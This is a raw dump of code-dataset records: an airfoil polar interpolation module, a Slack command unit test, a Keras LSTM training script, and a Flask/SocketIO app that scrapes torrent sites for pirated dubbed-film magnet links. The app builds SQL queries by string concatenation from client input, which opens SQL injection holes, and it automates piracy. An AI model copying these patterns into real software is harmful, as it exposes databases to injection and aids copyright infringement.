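# [aoa_deg, cl, cd, cm] and rows must be sorted by increasing angle of
# attack (initialise() enforces this via np.diff(table[:, 0]) > 0).
# Minimal usage sketch with made-up illustrative numbers:
#
#   import numpy as np
#   p = polar()
#   p.initialise(np.array([[-4., -0.2, 0.010, 0.00],
#                          [ 0.,  0.2, 0.008, 0.01],
#                          [ 4.,  0.6, 0.012, 0.01]]))
#   cl, cd, cm = p.get_coefs(2.0)  # linear interpolation at 2 deg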
self.aoa_cl0_deg = None\n\n def initialise(self, table):\n\n # Store the table\n if (np.diff(table[:, 0]) > 0.).all():\n self.table = table\n else:\n raise RuntimeError(\"ERROR: angles of attack not ordered\")\n\n # Look for aoa where CL=0\n npoints = self.table.shape[0]\n matches = []\n for ipoint in range(npoints - 1):\n if self.table[ipoint, 1] == 0.:\n matches.append(self.table[ipoint, 0])\n elif (self.table[ipoint, 1] < 0. and self.table[ipoint + 1, 1] > 0):\n # elif ((self.table[ipoint, 1] < 0. and self.table[ipoint + 1, 1] > 0) or\n # (self.table[ipoint, 1] > 0. and self.table[ipoint + 1, 1] < 0)):\n if (self.table[ipoint, 0] <= 0.):\n matches.append(np.interp(0,\n self.table[ipoint:ipoint+2, 1],\n self.table[ipoint:ipoint+2, 0]))\n # else:\n # print(\"WARNING: Be careful negative camber airfoil not supported\")\n\n iaoacl0 = 0\n aux = np.abs(matches[0])\n for imin in range(len(matches)):\n if np.abs(matches[imin]) < aux:\n aux = np.abs(matches[imin])\n iaoacl0 = imin\n self.aoa_cl0_deg = matches[iaoacl0]\n\n def get_coefs(self, aoa_deg):\n\n cl = np.interp(aoa_deg, self.table[:, 0], self.table[:, 1])\n cd = np.interp(aoa_deg, self.table[:, 0], self.table[:, 2])\n cm = np.interp(aoa_deg, self.table[:, 0], self.table[:, 3])\n\n return cl, cd, cm\n\n def get_aoa_deg_from_cl_2pi(self, cl):\n\n return cl/2/np.pi/deg2rad + self.aoa_cl0_deg\n\n def redefine_aoa(self, new_aoa):\n\n naoa = len(new_aoa)\n # Generate the same polar interpolated at different angles of attack\n # by linear interpolation\n table = np.zeros((naoa, 4))\n table[:, 0] = new_aoa\n for icol in range(1, 4):\n table[:, icol] = np.interp(table[:, 0],\n self.table[:, 0],\n self.table[:, icol])\n\n new_polar = polar()\n new_polar.initialise(table)\n return new_polar\n\n\ndef interpolate(polar1, polar2, coef=0.5):\n\n all_aoa = np.sort(np.concatenate((polar1.table[:, 0], polar2.table[:, 0]),))\n\n different_aoa = []\n different_aoa.append(all_aoa[0])\n for iaoa in range(1, len(all_aoa)):\n if not all_aoa[iaoa] == different_aoa[-1]:\n different_aoa.append(all_aoa[iaoa])\n\n new_polar1 = polar1.redefine_aoa(different_aoa)\n new_polar2 = polar2.redefine_aoa(different_aoa)\n\n table = (1. 
- coef)*new_polar1.table + coef*new_polar2.table\n\n new_polar = polar()\n new_polar.initialise(table)\n return new_polar\n","sub_path":"sharpy/aero/utils/airfoilpolars.py","file_name":"airfoilpolars.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"437027535","text":"from app.controller.command.commands import IQuitCommand\nfrom app.model import User, Team, Permissions\nfrom unittest import TestCase\nfrom tests.memorydb import MemoryDB\n\n\ndef make_user(slack, gid, guser, perm):\n user = User(slack)\n user.github_id = gid\n user.github_username = guser\n user.permissions_level = perm\n return user\n\n\ndef make_team(ghid, leads_ghid, members_ghid):\n team = Team(ghid, 'COVID19', 'Crime Stoppers')\n team.team_leads = team.team_leads.union(leads_ghid)\n team.members = team.members.union(members_ghid)\n return team\n\n\nclass TestIQuitCommand(TestCase):\n def setUp(self):\n self.users = {\n 'u1': make_user('u1', 'g1', 'G1', Permissions.admin),\n 'u2': make_user('u2', 'g2', 'G2', Permissions.member),\n 'u3': make_user('u3', 'g3', 'G3', Permissions.team_lead),\n 'u4': make_user('u4', 'g4', 'G4', Permissions.team_lead),\n 'u5': make_user('u5', 'g5', 'G5', Permissions.member),\n 'u6': make_user('u6', 'g6', 'G6', Permissions.member)\n }\n self.teams = {\n 't1': make_team('t1', [], []),\n 't2': make_team('t2', ['g1', 'g3'], ['g1', 'g2', 'g3']),\n 't3': make_team('t3', ['g1'], ['g1', 'g4', 'g2', 'g5', 'g6']),\n 't4': make_team('t4', [], ['g6']),\n 't5': make_team('t5', ['g4'], ['g5', 'g3']),\n 't6': make_team('t6', ['g3', 'g4'], ['g3', 'g4']),\n 't7': make_team('t7', ['g3'], ['abacus', 'g3'])\n }\n self.facade = MemoryDB(users=self.users.values(),\n teams=self.teams.values())\n self.cmd = IQuitCommand(self.facade)\n\n def test_get_no_duplicate_users(self):\n actual, resp = self.cmd.handle('', 'u2')\n self.assertEqual(actual.count('u1'), 1)\n self.assertEqual(actual.count('u3'), 1)\n\n def test_members_only_see_leads_n_admins(self):\n actual, resp = self.cmd.handle('', 'u6')\n self.assertEqual(actual.count('u1'), 1)\n self.assertNotEqual(actual.count('u2'), 1)\n self.assertNotEqual(actual.count('u3'), 1)\n self.assertNotEqual(actual.count('u6'), 1)\n\n def test_no_team_lead_so_return_nobody(self):\n actual, resp = self.cmd.handle('', 'u5')\n self.assertEqual(actual.count('u1'), 1)\n self.assertEqual(actual.count('u3'), 1)\n self.assertEqual(actual.count('u4'), 1)\n self.assertNotEqual(actual.count('u5'), 1)\n\n def test_cannot_find_caller(self):\n actual, resp = self.cmd.handle('', 'unknown user')\n self.assertEqual(actual, IQuitCommand.lookup_error)\n self.assertEqual(resp, 200)\n\n def test_call_as_team_lead(self):\n self.teams['t6'].github_team_name = 'pretty bad lol'\n actual, resp = self.cmd.handle('', 'u4')\n self.assertTrue('replacing you with <@u5>' in actual or\n 'replacing you with <@u3>' in actual)\n self.assertEqual(actual.count('u1'), 1)\n self.assertIn('cannot find your replacement; deleting team', actual)\n\n def test_call_as_team_lead_gh_only_members(self):\n self.teams['t7'].github_team_name = 'somewhat sketch'\n actual, resp = self.cmd.handle('', 'u3')\n self.assertIn(\n '*Team somewhat sketch*:'\n ' cannot find your replacement; deleting team', actual)\n\n def test_call_as_admin(self):\n actual, resp = self.cmd.handle('', 'u1')\n self.assertEqual(IQuitCommand.adminmsg, 
actual)\n","sub_path":"tests/app/controller/command/commands/iquit_test.py","file_name":"iquit_test.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"336279276","text":"#!/usr/bin/python\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Dense\nfrom keras.layers.recurrent import LSTM\nfrom keras.utils import plot_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing import sequence\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Dropout\nfrom keras.preprocessing import sequence\nfrom keras.layers.wrappers import Bidirectional\n\nimport tensorflow as tf\nimport os, sys\nimport numpy as np\nimport pickle\n# 套件匯入與設定\n# GPU設定\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" #1080\n# config = tf.ConfigProto()\n# config.gpu_options.allow_growth=True\n# sess = tf.Session(config=config)\n\ndef load_data(train_data_path):\n # 讀入訓練資料\n x_train = []\n y_train = []\n with open(train_data_path, 'r') as f:\n for i, line in enumerate(f):\n data = line.split(' +++$+++ ')\n # 讀入標籤\n label = int(data[0])\n if label == 1:\n y_train.append([0.,1.])\n else:\n y_train.append([1.,0.])\n # 讀入句子\n x_train.append(data[1].strip('\\n'))\n\n x_train = np.array(x_train)\n y_train = np.array(y_train)\n \n return x_train,y_train\n\ndef build_model_1():\n model = Sequential()\n model.add(Embedding(len(tokenizer.word_index)+1, 200, input_length=38, trainable=True))\n model.add(LSTM(256, return_sequences=True, dropout=0.2, recurrent_dropout=0.2))\n model.add(LSTM(256, dropout=0.2))\n model.add(Dense(2, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n print(model.summary())\n\n return model\n\ndef build_model_2():\n model = Sequential()\n model.add(Embedding(len(tokenizer.word_index)+1, 200, input_length=38, trainable=True))\n model.add(Bidirectional(LSTM(100, return_sequences=True, dropout=0.2, recurrent_dropout=0.2)))\n model.add(Bidirectional(LSTM(64, dropout=0.2, recurrent_dropout=0.2)))\n model.add(Dense(2, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n print(model.summary())\n \n return model\n\nx_train,y_train = load_data(sys.argv[1])\n\nwith open('tokenizer.pickle', 'rb') as f:\n tokenizer = pickle.load(f)\n\nmax_review_length = 38\nx_train_dictionary=tokenizer.texts_to_sequences(x_train)\nx_train =sequence.pad_sequences(x_train_dictionary, maxlen=max_review_length)\n\nmodel1 = build_model_1()\nmodel2 = build_model_2()\n\nhistory = model1.fit(x_train, y_train,validation_split=0.1, epochs=2, batch_size=128)\nhistory = model2.fit(x_train, y_train,validation_split=0.1, epochs=2, batch_size=128)\n\nmodel1.save_weights(\"model1_weight.h5\")\nmodel2.save_weights(\"model2_weight.h5\")","sub_path":"hw4/hw4_train.py","file_name":"hw4_train.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"359384658","text":"# -*- coding: utf-8 -*-\nfrom requests_html import HTMLSession\nfrom flask import Flask, request, render_template, redirect\nimport imdb\nfrom bson.json_util import dumps\nimport dns\nfrom imdbparser import IMDb\nfrom pymongo import MongoClient\nfrom guessit import guessit\nfrom flask_socketio import SocketIO, emit\nimport logging\nimport threading\nimport os\nimport re\nfrom modulo_mysql import select\n#pip3 install 
requests_html flask imdbpy bson pymongo dnspython imdbparser guessit flask_socketio mysql-connector\n\nimport libtorrent as lt\nimport time\n\nses = lt.session({\n\t 'upload_rate_limit': 0\n\t,'download_rate_limit': 0\n\t,'active_downloads': -1\n\t,'active_limit': -1\n\t,'alert_mask': 0\n})\n\nses.listen_on(6881, 6891)\nses.add_extension('ut_metadata')\nses.add_extension('ut_pex')\nses.add_extension('smart_ban')\nses.add_extension('metadata_transfer')\nses.add_dht_router(\"router.utorrent.com\", 6881)\nses.add_dht_router(\"router.bittorrent.com\", 6881)\nses.add_dht_router(\"dht.transmissionbt.com\", 6881)\nses.add_dht_router('127.0.0.1',6881) \nses.add_dht_router(\"dht.aelitis.com\", 6881)\nses.start_dht()\nses.start_lsd()\nses.start_natpmp()\nses.start_upnp() \n\n# https://www.btmulu.com/hash/\n# ps -fA | grep main.py\n# kill 509\n\nsession = HTMLSession()\napp = Flask('app')\napp.debug = False\n\nia = imdb.IMDb()\ntop = ia.get_top250_movies()\n\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\nsocketio = SocketIO(app, async_mode='threading',\n cors_allowed_origins=\"*\", logger=False, engineio_logger=False)\n\nimport os, shutil\nimport time\nimport stat\n\nfolder = 'downloads/'\nif not os.path.exists(folder):\n os.makedirs(folder)\n\nparams = { 'save_path': 'downloads/',\n 'auto_managed': True,\n 'file_priorities': [0]*5}\n\ndef apagar_download():\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n #print('Apagado',file_path)\n socketio.emit('log', 'Apagado: '+file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n #print('Apagado',file_path)\n socketio.emit('log', 'Apagado: '+file_path)\n except Exception as e:\n print('Failed to delete %s. 
Reason: %s' % (file_path, e))\n\napagar_download()\n\ndef getConfig(config, default):\n try:\n for r in select('select parametro from configuracao where config=\"'+config+'\"'):\n return int(r[0])\n return default\n except:\n return default\n\n\n \nmagnet_banco = []\nimdb_filme_banco = []\nimdb_serie_banco = [] \n\ndef iniciar_banco():\n try:\n current_day = int(time.strftime(\"%d\", time.localtime()))\n mod_day = int(time.strftime(\"%d\", time.gmtime ( os.stat('magnet_banco.txt') [ stat.ST_MTIME ] ) ))\n if current_day == mod_day:\n read_banco()\n print('banco local',current_day, mod_day)\n else:\n write_banco()\n print('banco web',current_day, mod_day) \n except Exception as e:\n print('Erro Carregando Banco')\n write_banco()\n\n\ndef write_banco():\n rett = select('select distinct(magnet) from registros')\n magnet_banco = []\n with open('magnet_banco.txt', 'w') as filehandle:\n for listitem in rett:\n filehandle.write('%s\\n' % listitem[0])\n magnet_banco.append(listitem[0])\n \n \n rett = select('select distinct(imdb) from registros where Filme = \"Sim\"')\n imdb_filme_banco = []\n with open('imdb_filme_banco.txt', 'w') as filehandle:\n for listitem in rett:\n filehandle.write('%s\\n' % listitem[0])\n imdb_filme_banco.append(listitem[0])\n\n rett = select(\"SELECT distinct(SUBSTRING_INDEX(imdb,' ',1)) FROM registros where Filme = 'Não'\") \n imdb_serie_banco = []\n with open('imdb_serie_banco.txt', 'w') as filehandle:\n for listitem in rett: \n filehandle.write('%s\\n' % listitem[0])\n imdb_serie_banco.append(listitem[0])\n\ndef read_banco():\n with open('magnet_banco.txt', 'r') as filehandle:\n for line in filehandle:\n currentPlace = line[:-1]\n magnet_banco.append(currentPlace)\n with open('imdb_filme_banco.txt', 'r') as filehandle:\n for line in filehandle:\n currentPlace = line[:-1]\n imdb_filme_banco.append(currentPlace)\n with open('imdb_serie_banco.txt', 'r') as filehandle:\n for line in filehandle:\n currentPlace = line[:-1]\n imdb_serie_banco.append(currentPlace)\n\n\n\n\n\n\n\ndef carregar_sky(links): \n print('Início: '+ str(len(links))+\" links\") \n socketio.emit('log', 'Carregando Links: '+str(len(links)))\n socketio.emit('atualizar', 'Detalhes do Link')\n \n\n for l in links: \n print(' ')\n li = l['link']\n try:\n ha = li[20:li.index('&')].lower()\n except:\n print(\"Erro Magnet: \" + li)\n ha = li[20:].lower()\n\n nao_existe = l['link'] not in magnet_banco\n if nao_existe:\n rett = select('select * from registros where magnet=\"'+l['link']+'\" limit 1')\n for x in rett:\n nao_existe = False\n \n imdb_encontrado = len(l['imdb']) > 0 \n \n if imdb_encontrado and nao_existe:\n \n arquivos = [] \n arquivos = carregar_torrent_download(ha)\n \n ind = 0\n for a in arquivos:\n \n a = a.replace('[WWW.BLUDV.TV] ', '').replace(\n 'Acesse o ORIGINAL WWW.BLUDV.TV ', '').replace(\n '[ACESSE COMANDOTORRENTS.COM] ', '').replace(\n 'WWW.COMANDOTORRENTS.COM', '').replace(\n 'WWW.BLUDV.TV', '').replace(\n '[WW.BLUDV.TV]', '').replace('WwW.LAPUMiAFiLMES.COM', '').replace('x264', '').replace('h264', '')\n try:\n\n if (a[-3:] not in ['exe', 'txt', 'url', 'srt', 'peg', 'jpg','png','nfo', 'zip']) and (a[-10:] not in ['sample.mkv']) and (a not in [\"COMANDOTORRENTS.COM.mp4\", \"slotsricos.com.mp4\", \"1XBET.COM_promo_SHREK_dinheiro_livre.mp4\",\"BLUDV.TV.mp4\", \"BLUDV.mp4\",\"LAPUMiA.mp4\",\"File Name\"]) and (\"LEGENDADO\" not in a)and (\"1XBET.COM_promo_SHREK_dinheiro_livre.mp4\" not in a):\n\n convert = guessit(a)\n confirma = isSerie(l['imdb'])\n \n if confirma == \"Sim\": \n \n if 
'episode' in convert:\n if not str(convert['episode']).isnumeric(): \n convert.pop('episode') \n \n if 'season' in convert: \n if not str(convert['season']).isnumeric():\n convert.pop('season') \n \n \n if 'season' not in convert:\n se = busca_temporada(a)\n if se:\n convert['season'] = se\n else:\n print('Sessão não encontrado', a)\n \n if 'episode' not in convert:\n se = busca_episodeo(a)\n if se:\n convert['episode'] = se\n else:\n print('Episódio não encontrado', a)\n \n \n \n if 'season' in convert and 'episode' in convert :\n \n sessao = str(convert['season']) \n episode = str(convert['episode'])\n \n im = l['imdb'] + \" \" + sessao + \" \" + episode\n\n ins = {\n 'id': 0,\n 'imdb': im,\n 'magnet': li,\n 'mapa': ind,\n 'nome': a,\n 'Filme':'Não',\n 'origem':l['origem']\n }\n #INSERT INTO `registros`(`imdb`, `magnet`, `mapa`, `nome`, `ano`, `titulo`, `Filme`, `origem`) VALUES ([value-1],[value-2],[value-3],[value-4],[value-5],[value-6],[value-7],[value-8])\n insert = \"INSERT INTO registros VALUES ('\"+im+\"','\"+li+\"','\"+str(ind)+\"','\"+a+\"',0,'','Não','')\"\n \n #print(insert)\n select(insert)\n print(im, ind, convert['title'], a)\n if ('NOS4A2' in a) or ('nos4a2' in a):\n socketio.emit('atualizar', 'Adicionado: NOS4A2 (' + im + \") \"+ a)\n else:\n socketio.emit('atualizar', dumps(ins))\n socketio.emit('log', 'Adicionado: '+im +\" \"+ convert['title'] +\" \"+a)\n else:\n \n socketio.emit('log', \"Sessão ou Episódio não identificado: \"+a)\n\n if confirma == \"Não\":\n ins = {'id': 0,'imdb': l['imdb'],'magnet': li,'mapa': ind,'nome': a, 'Filme':'Sim','origem':l['origem']}\n insert = \"INSERT INTO registros VALUES ('\"+l['imdb']+\"','\"+li+\"','\"+str(ind)+\"','\"+a+\"',0,'','Sim','')\"\n #print(insert)\n select(insert)\n \n socketio.emit( 'atualizar', dumps(ins))\n print(l['imdb'], ind, convert['title'], a)\n socketio.emit('log', 'Adicionado: '+l['imdb'] +\" \"+ convert['title'] +\" \"+a)\n \n if confirma == \"Erro\":\n print(\"Erro Identificando IMDB: \",l['imdb'])\n socketio.emit('log', \"Erro Identificando IMDB: \"+l['imdb'])\n \n\n except Exception as e:\n print('Erro',e)\n socketio.emit('log', 'Erro Carregando: '+ ha +\" \"+ a)\n\n ind = ind + 1\n \n if len(arquivos)==0:\n print('Metadado não encontrado: ' + ha) \n socketio.emit('log', 'Metadado não encontrado: ' + ha)\n\n else:\n if not imdb_encontrado:\n socketio.emit('log', 'IMDB não Encontrado: ' + ha)\n print('IMDB não Encontrado: ' + ha)\n if not nao_existe:\n socketio.emit('log', 'Já Existe: ' + ha)\n print('Já Existe: ' + ha)\n \n\n socketio.emit('atualizar', 'Fim da Busca')\n socketio.emit('log', 'Fim da Busca')\n limpar()\n\ndef busca_temporada(nome):\n se = re.findall(' ([0-9]) Tempo| ([0-9][0-9]) Tempo| ([0-9])ª Tempo| ([0-9][0-9])ª Tempo| \\.([0-9])ª Tempo| \\.([0-9][0-9])ª Tempo', nome, re.IGNORECASE)\n if len(se) > 0:\n for r in se[0]:\n if len(r) > 0: \n return r\n return \"\"\n\ndef busca_episodeo(nome):\n se = re.findall('/([0-9]) - |/([0-9][0-9]) - |/([0-9])-|/([0-9][0-9])-|/([0-9][0-9]) |[0-9]\\.([0-9][0-9]) ', nome, re.IGNORECASE)\n if len(se) > 0:\n for r in se[0]:\n if len(r) > 0: \n return r\n return \"\"\n\nseries_filme = {} \n\ndef isSerie(imdb, seq=0):\n try:\n im = str(imdb).strip()[2:]\n if str(imdb).strip() in imdb_filme_banco:\n return \"Não\"\n if str(imdb).strip() in imdb_serie_banco:\n return \"Sim\"\n \n if series_filme.get(im) == None: \n movie = ia.get_movie(im)\n if movie.get('title') != None:\n if movie.get('seasons') == None:\n series_filme[im] = \"Não\"\n return \"Não\"\n else:\n 
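                # a populated 'seasons' field marks the IMDb title as a series; memoise the verdict in series_filme\n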
series_filme[im] = \"Sim\"\n return \"Sim\"\n else:\n return \"Erro\"\n else:\n return series_filme.get(im)\n except:\n if seq==1:\n print('Erro Tentativa isSerie 2', imdb)\n return \"Erro\"\n else:\n print('Erro Tentativa isSerie 1', imdb)\n return isSerie(imdb, 1)\n \n\n \ndef carregar_torrent_download(link, tempo=10):\n r=[]\n \n handle = lt.add_magnet_uri(ses, \"magnet:?xt=urn:btih:\"+link, params)\n handle.set_sequential_download(1)\n handle.resume()\n \n contador = 0 \n socketio.emit('log', 'Esperando Download do Torrent!')\n \n while (not handle.has_metadata() and contador < tempo): \n contador += 1\n time.sleep(2)\n \n if handle.has_metadata():\n torinfo = handle.get_torrent_info()\n\n for x in range(torinfo.files().num_files()):\n r.append(torinfo.files().file_path(x))\n #print(torinfo.files().file_path(x))\n\n ses.remove_torrent(handle)\n \n apagar_download()\n return r\n\ndef limpar():\n\n select(\"delete FROM registros where nome like '%.jpg' or nome like '%.str' or nome like '%.url' or nome like '%.exe' or nome like '%.sub' or nome like '%.txt' or nome like '%.nfo' or nome like '%.jpeg' or nome like '%.png' or nome like '%.zip' or nome like '%sample%' or nome = '1XBET.COM_promo_SHREK_dinheiro_livre.mp4' or nome like '%HDCAM%' or nome = 'slotsricos.com.mp4' or nome = 'BLUDV.TV.mp4' or nome = 'LAPUMiA.mp4' or nome = 'COMANDOTORRENTS.COM.mp4'\")\n\n rett = select(\"SELECT magnet, mapa FROM registros group by magnet, mapa having count(magnet) > 1 and count(mapa) > 1\")\n for r in rett:\n #print('delete from registros where magnet=\"'+r[0]+'\" and mapa ='+str(r[1])+' limit 1')\n select('delete from registros where magnet=\"'+r[0]+'\" and mapa ='+str(r[1])+' limit 1')\n \n \n corrigir_titulo()\n \n\ndef corrigir_titulo():\n print('corrigir_titulo: Iniciado') \n rett = select(\"SELECT distinct(SUBSTRING_INDEX(imdb,' ',1)) as im FROM registros where titulo = ''\")\n for r in rett:\n # print(r)\n try:\n print(r[0])\n im = str(r[0]).strip()[2:]\n movie = ia.get_movie(str(im)) \n titu = movie.get('title').replace(\"'\",\"\") \n print(titu)\n print(movie.get('year'))\n if movie.get('year')!=None:\n #print(\"update registros set titulo = '\"+movie.get('title')+\"', ano = \"+str(movie.get('year'))+\" where imdb like '%\"+str(im)+\"%'\")\n select(\"update registros set titulo = '\"+titu+\"', ano = \"+str(movie.get('year'))+\" where imdb like '%\"+str(im)+\"%'\")\n except Exception as e: \n print(e) \n print('Erro Sem Título: ', im)\n \n\n@app.route('/link')\ndef link():\n q = request.args.get(\"q\")\n i = request.args.get(\"i\")\n print(q)\n if (q != None):\n socketio.start_background_task(thread_link, q, i)\n return redirect(\"/\", code=302)\n\n\n@app.route('/')\ndef hello_world():\n q = request.args.get(\"q\")\n print(q)\n if (q != None):\n lin = \"https://ondeeubaixo.net/index.php?campo1=\" + q + \"&nome_campo1=pesquisa&categoria=lista&\"\n socketio.start_background_task(thread_lista, lin, 3)\n return render_template('busca.html')\n\n\ndef processa_pagina(link, id_imdb, ret, imdb_pref=\"\", origem=\"\"):\n\n \n r2 = session.get(link)\n if len(id_imdb) == 0:\n try:\n id_imdb = r2.html.find(\"a[href*='www.imdb.com']\", first=True).attrs['href']\n id_imdb = id_imdb.replace(\"http://www.imdb.com/title/\", \"\").replace(\"https://www.imdb.com/title/\", \"\").replace(\"/\", \"\").replace(\"/\", \"\").replace(\"?ref_=nv_sr_\", \"\").replace(\"?ref_=plg_rt_1\", \"\").replace(\"http:www.imdb.com\", \"\").replace(\"https:www.imdb.com\", \"\").strip()\n except:\n print('Erro Convertendo IMDB', 
link)\n id_imdb = \"\"\n\n if len(imdb_pref) > 0:\n if id_imdb == imdb_pref:\n for html in r2.html.find('a[href^=\"magnet\"]'):\n ret.append({'imdb': id_imdb, 'link': list(html.links)[0], 'origem':origem})\n \n else: \n for html in r2.html.find('a[href^=\"magnet\"]'):\n ret.append({'imdb': id_imdb, 'link': list(html.links)[0], 'origem':origem})\n \ndef thread_link(link, imdb):\n \n print(imdb, link)\n socketio.emit('atualizar', 'Carregando: ' + link)\n socketio.emit('log', 'Carregando: '+link)\n s = []\n processa_pagina(link, imdb, s,\"\",\"link\") \n carregar_sky(s)\n\n\ndef thread_lista(url, tamanho):\n s = []\n \n for x in range(1, tamanho):\n print(url + str(x)) \n r = session.get(url + str(x))\n titulos = r.html.find('.list-inline > li')\n for elem in titulos: \n link = elem.find('a', first=True).attrs['href']\n dublado = elem.find('.idioma_lista', first=True).text.strip() \n if dublado == \"Dublado\":\n print(link)\n socketio.emit('log', 'Carregando: '+link)\n socketio.emit('atualizar', 'Link: ' + link)\n processa_pagina(link, \"\", s,\"\",\"lancamentos\")\n \n carregar_sky(s)\n\ndef thread_busca(url, tamanho, imdb):\n s = [] \n for x in range(1, tamanho):\n print(url + str(x)) \n r = session.get(url + str(x))\n titulos = r.html.find('.list-inline .semelhantes')\n for elem in titulos: \n link = elem.find('a', first=True).attrs['href']\n print(link)\n socketio.emit('atualizar', 'Link: ' + link)\n socketio.emit('log', 'Carregando: '+link)\n processa_pagina(link, \"\", s, imdb, \"buscar\") \n \n carregar_sky(s)\n\n\ndef thread_lista_preferidos():\n s = []\n \n for pref in select('select * from preferidos'):\n \n r = session.get(\"https://ondeeubaixo.net/index.php?campo1=\" + pref[0] + \"&nome_campo1=pesquisa&categoria=lista&\")\n titulos = r.html.find('.list-inline .semelhantes')\n for elem in titulos: \n link = elem.find('a', first=True).attrs['href']\n print(link)\n socketio.emit('atualizar', 'Link: ' + link)\n socketio.emit('log', 'Carregando: '+link)\n processa_pagina(link, \"\", s, pref[1],\"lancamentos\") \n \n carregar_sky(s)\n\n\n@socketio.on('preferido')\ndef preferido(im, nome):\n print(\"Preferido:\" + im) \n select('insert into preferidos values(\"'+nome+'\", \"'+im+'\")')\n socketio.emit('resposta_funcoes', 'Adicionado ao Preferidos: ' + nome)\n socketio.emit('log', 'Adicionado ao Preferidos: ' + nome)\n\n\n@socketio.on('remove_preferido')\ndef remove_preferido(im):\n print(\"Não Preferido:\" + im)\n select('delete from preferidos where imdb =\"'+im+'\"') \n socketio.emit('resposta_funcoes', 'Removido dos Preferidos: ' + im)\n socketio.emit('log', 'Removido dos Preferidos: ' + im)\n\n\n@socketio.on('apagar')\ndef apagar(im):\n print(\"Apagado: \" + im)\n select('delete from registros where imdb like \"%'+im+'%\"')\n \n socketio.emit('resposta_funcoes', 'Apagado: ' + im)\n socketio.emit('log', 'Apagado: ' + im)\n\n@socketio.on('carregar_lancamentos')\ndef sock_lancamento(): \n nav = sock_navegar()\n seq = 1\n for n in nav:\n im_n = n['link'][7:16] \n for b in select('select * from registros where imdb like \"%'+im_n+'%\" limit 1'):\n socketio.emit('atualizar', dumps({'imdb':b[0],'magnet':b[1],'mapa':b[2],'nome':b[3],'ano':b[4],'titulo':b[5],'Filme':b[6],'origem':'salvos'}))\n seq = seq + 1\n\n@socketio.on('config')\ndef config(c,parametro):\n print(\"Configurado: \" + c,parametro)\n select('delete from configuracao where config=\"'+c+'\"')\n select('insert into configuracao values(\"'+c+'\", \"'+parametro+'\")')\n socketio.emit('log', 'Config Adicionada: ' + c +' 
'+parametro)\n\n \ndef sock_navegar():\n s = [] \n r = session.get('https://www.imdb.com/chart/moviemeter?sort=us,desc&mode=simple&page=1')\n titulos = r.html.find('.lister-list tr .titleColumn')\n for elem in titulos:\n link = elem.find('a', first=True).attrs['href']\n ano = elem.find('span', first=True).text\n titulo = elem.find('a', first=True).text.strip()\n s.append({'link':link, 'ano':ano, 'titulo':titulo+' (Filme)'}) \n \n r = session.get('https://www.imdb.com/chart/tvmeter?sort=us,desc&mode=simple&page=1')\n titulos = r.html.find('.lister-list tr .titleColumn')\n for elem in titulos:\n link = elem.find('a', first=True).attrs['href']\n ano = elem.find('span', first=True).text\n titulo = elem.find('a', first=True).text.strip()\n s.append({'link':link, 'ano':ano, 'titulo':titulo+' (Série)'}) \n \n return s\n\n@socketio.on('link')\ndef sock_link(message, im):\n socketio.emit('limpar')\n print(message+\" \"+im)\n socketio.start_background_task(thread_link, message, im)\n\n@socketio.on('buscar')\ndef sock_buscar(message, imdb):\n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ' + message)\n socketio.emit('log', 'Buscando: ' + message)\n \n lin = \"https://ondeeubaixo.net/index.php?campo1=\" + message + \"&nome_campo1=pesquisa&categoria=lista&\"\n socketio.start_background_task(thread_busca, lin, getConfig('tamanho', 3), imdb)\n\n\n@socketio.on('lista')\ndef sock_lista(message):\n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ')\n socketio.emit('log', 'Buscando: ') \n socketio.start_background_task(thread_lista, message, getConfig('tamanho', 3))\n\n@socketio.on('lista_preferidos')\ndef sock_lista_preferidos():\n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ')\n socketio.emit('log', 'Carregando Preferidos: ')\n \n socketio.start_background_task(thread_lista_preferidos)\n\n@socketio.on('inicio')\ndef sock_iniciado():\n print('inicio')\n # socketio.start_background_task(thread_lista, 'https://ondeeubaixo.net/lancamentos-', 3)\n\n@socketio.on('parar')\ndef parar():\n print(\"Parando\")\n \n\n@socketio.on('carregar_preferidos')\ndef sock_preferidos():\n \n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ')\n \n for b in select('select * from preferidos'):\n socketio.emit('atualizar', dumps({'nome': b[0], 'imdb':b[1], 'origem':'preferidos'}))\n socketio.emit('atualizar', 'Fim da Busca')\n\n@socketio.on('buscar_im')\ndef buscar_im(nome): \n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: '+nome)\n print(\"Buscando IMDB: \" + nome)\n for b in select('select * from registros where nome like \"%'+nome+'%\" or titulo like \"%'+nome+'%\" or imdb like \"%'+nome+'%\" order by imdb desc'):\n socketio.emit('atualizar', dumps({'imdb':b[0],'magnet':b[1],'mapa':b[2],'nome':b[3],'ano':b[4],'titulo':b[5],'Filme':b[6],'origem':'salvos'}))\n socketio.emit('atualizar', 'Fim da Busca')\n\n@socketio.on('connect')\ndef test_connect():\n print('conectado')\n\n@socketio.on('tabela')\ndef sock_tabela():\n print('tabela')\n socketio.emit('log', 'Carregando Tabela')\n tabela = []\n for b in select('select * from registros order by imdb desc'):\n tabela.append({'imdb':b[0],'magnet':b[1],'mapa':b[2],'nome':b[3],'ano':b[4],'titulo':b[5],'Filme':b[6],'origem':b[7]})\n socketio.emit('carregar_tabela', dumps(tabela))\n\nlimpar()\niniciar_banco()\n\n#socketio.start_background_task(thread_link, 